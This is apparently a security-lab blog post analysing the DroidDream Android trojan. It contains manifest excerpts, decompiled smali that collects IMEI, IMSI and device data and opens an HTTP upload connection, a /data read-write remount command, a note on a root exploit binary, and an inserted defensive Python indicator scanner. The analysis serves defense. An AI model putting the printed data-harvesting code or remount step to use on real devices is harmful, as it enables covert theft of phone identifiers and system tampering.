A new Android Trojan named "DroidDream" was discovered by the mobile security company Lookout Inc. today. This trojan pirates a legitimate application, repackages it as a new one, and the malware writer(s) published the result in Google's official Android Market. More than 50 applications suffered this kind of attack; the illegally modified ones have now been pulled from the market.

     With the collection of applications published in the Google market, other local markets and websites, we did a brief and quick analysis of the samples we have. More detailed information will be added as the investigation goes on.

     At first glance, the infected application does not request too many privileges, so the user may not notice anything abnormal. For example,

<!-- Only a few privileges are required -->
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.INTERNET" />

        <activity android:name="com.android.root.main">
            <intent-filter>
                <!-- Intercept the launch activity -->
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <!-- The injected services run in their own ":remote" processes -->
        <service android:name="com.android.root.Setting" android:process=":remote" />
        <service android:name="com.android.root.AlarmReceiver" android:process=":remote2" />

     Unpacking the package, we found that some additional code had been added:


adbRoot$1.smali  adbRoot.smali  AlarmReceiver$1.smali  AlarmReceiver.smali  main.smali  Setting$1.smali  Setting$2.smali  Setting.smali  udevRoot.smali
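As an added triage check (not part of the original analysis), the following Python script walks an apktool-style unpacked APK directory and flags the indicators listed above: the com.android.root.* components in the manifest, services forced into their own ":remote" process, and the injected smali class files. The directory layout, the constructed sample manifest and the build_sample helper are assumptions made for this demo.

```python
import os
import re
import tempfile

# Indicators taken from the manifest and smali listing above.
ROOT_COMPONENTS = ("com.android.root.main", "com.android.root.Setting",
                   "com.android.root.AlarmReceiver")
INJECTED_SMALI = {"adbRoot.smali", "udevRoot.smali", "AlarmReceiver.smali",
                  "Setting.smali", "main.smali"}
# <service> elements that the manifest pushes into a private ":remote*" process
SERVICE_RE = re.compile(
    r'<service\b[^>]*android:name="([^"]+)"[^>]*android:process=":remote\d*"')

def scan_unpacked_apk(root):
    """Return findings for an apktool-style directory; {} means nothing matched."""
    findings = {}
    manifest = os.path.join(root, "AndroidManifest.xml")
    if os.path.isfile(manifest):
        with open(manifest, encoding="utf-8", errors="replace") as fh:
            xml = fh.read()
        hits = [c for c in ROOT_COMPONENTS if f'android:name="{c}"' in xml]
        if hits:
            findings["root_components"] = hits
        if SERVICE_RE.search(xml):
            findings["remote_services"] = SERVICE_RE.findall(xml)
    smali_dir = os.path.join(root, "smali", "com", "android", "root")
    if os.path.isdir(smali_dir):
        present = sorted(INJECTED_SMALI & set(os.listdir(smali_dir)))
        if present:
            findings["injected_smali"] = present
    return findings

# Constructed sample (not a real APK): the manifest fragment and smali file
# names quoted above, written to a throwaway directory so this runs offline.
SAMPLE_MANIFEST = """<manifest><application>
  <activity android:name="com.android.root.main" />
  <service android:name="com.android.root.Setting" android:process=":remote" />
  <service android:name="com.android.root.AlarmReceiver" android:process=":remote2" />
</application></manifest>"""

def build_sample(infected=True):
    root = tempfile.mkdtemp(prefix="droiddream_")
    if infected:
        with open(os.path.join(root, "AndroidManifest.xml"), "w") as fh:
            fh.write(SAMPLE_MANIFEST)
        smali_dir = os.path.join(root, "smali", "com", "android", "root")
        os.makedirs(smali_dir)
        for name in ("adbRoot.smali", "udevRoot.smali", "Setting.smali"):
            open(os.path.join(smali_dir, name), "w").close()
    return root
```

Call scan_unpacked_apk(build_sample()) to see the three finding keys, or point it at a real apktool output directory to triage a suspect package.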


     It uses JNI, which makes the analysis a bit harder.

Exec.smali -> Exec.java :
package jackpal.androidterm;

import java.io.FileDescriptor;

public class Exec {
    static {
        // loads the JNI library "libandroidterm.so" when the class is first used
        System.loadLibrary("androidterm");
    }
}

The collected personal data is handled in Setting.smali:
    .line 306
    .local v1, fm:Ljava/util/Formatter;
    const/4 v2, 0x5
    new-array v2, v2, [Ljava/lang/Object;
    const/4 v3, 0x0
    const-string v4, "502"
    aput-object v4, v2, v3
    const/4 v3, 0x1
    const-string v4, "10028"           # trojan version
    aput-object v4, v2, v3
    const/4 v3, 0x2
    # collect mobile IMEI
    invoke-static {p1}, Lcom/android/root/adbRoot;->getIMEI(Landroid/content/Context;)Ljava/lang/String;
    move-result-object v4
    aput-object v4, v2, v3
    const/4 v3, 0x3
    # collect mobile IMSI
    invoke-static {p1}, Lcom/android/root/adbRoot;->getIMSI(Landroid/content/Context;)Ljava/lang/String;
    move-result-object v4
    aput-object v4, v2, v3
    const/4 v3, 0x4
    new-instance v4, Ljava/lang/StringBuilder;
    sget-object v5, Landroid/os/Build;->DEVICE:Ljava/lang/String;
    invoke-static {v5}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    move-result-object v5
    invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    const-string v5, ":"
    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    move-result-object v4
    sget v5, Landroid/os/Build$VERSION;->SDK_INT:I            # collect mobile Android system version
    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    move-result-object v4
    invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    move-result-object v4
    aput-object v4, v2, v3
    invoke-virtual {v1, v0, v2}, Ljava/util/Formatter;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/util/Formatter;
    .end local v0           #data:Ljava/lang/String;
    invoke-virtual {v0}, Ljava/lang/String;->getBytes()[B
    move-result-object v1
    .line 308
    .local v1, buff:[B
    invoke-static {v1}, Lcom/android/root/adbRoot;->crypt([B)V    # should be encrypted, but the local backup wasn't
    .line 311
    new-instance v0, Ljava/net/URL;
    invoke-direct {v0, p0}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
    .line 312
    .local v0, aURL:Ljava/net/URL;
    invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
    move-result-object p0
    .end local p0
    check-cast p0, Ljava/net/HttpURLConnection;
    .line 313
    .local p0, aConnection:Ljava/net/HttpURLConnection;
    const/4 v0, 0x1
    invoke-virtual {p0, v0}, Ljava/net/HttpURLConnection;->setDoOutput(Z)V

    .line 344
    const-string p0, "pref_config_setting"
    # writes the log into data/data/droiddream/com.droiddream.lovePositions/shared_prefs/pref_config_setting.xml
    const/4 v0, 0x0
    invoke-virtual {p1, p0, v0}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
    .end local v0           #bao:Ljava/io/ByteArrayOutputStream;
    move-result-object p0
    invoke-interface {p0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
    move-result-object p0
    .line 345
    .local p0, editor:Landroid/content/SharedPreferences$Editor;
    const-string p1, "done"

    From LogCat, it tries to connect to http://www.umeng.com/app_logs; the whois information for umeng.com points to a Beijing registrant. The website is a statistics-counting service for applications, which seems harmless at first glance.

    It collects the IMEI, IMSI, SDK version, Android OS version, language, etc., and stores them in /data/data/droiddream/com.droiddream.lovePositions/shared_prefs/mobclick_agent_header_com.droiddream.lovePositions.xml

    In /data/data/droiddream/com.droiddream.lovePositions/files:

remount_data.sh  remount_sys_ro.sh  remount_sys_rw.sh

The remount_xxx.sh scripts attempt to remount /data read-write so that the trojan can access the stored files generated by other applications. The command is similar to the one below.

mount -o remount,rw,nosuid,nodev -t yaffs2 /dev/block/mtdblock1 /data

     It also collects the information under /proc and stores it in /data/data/droiddream/com.droiddream.lovePositions/files/proc

     A snippet of /data/data/droiddream/com.droiddream.lovePositions/files/rageagainstthecage is shown in the figure below.

      Checking the file attributes and type of rageagainstthecage, we found:

    Obviously it's an executable file.

    Inside it, /proc/%d/cmdline is handled the same way as in the code at http://hiapk.com/viewthread.php?action=printable&tid=585198, so it should be some attempt to root the system. However, we are not yet sure of the intention behind rooting or of the actions taken after rooting; there is a lot of code that needs further analysis. Stay tuned!

By AegisLab.

Analyzer: Zod Lin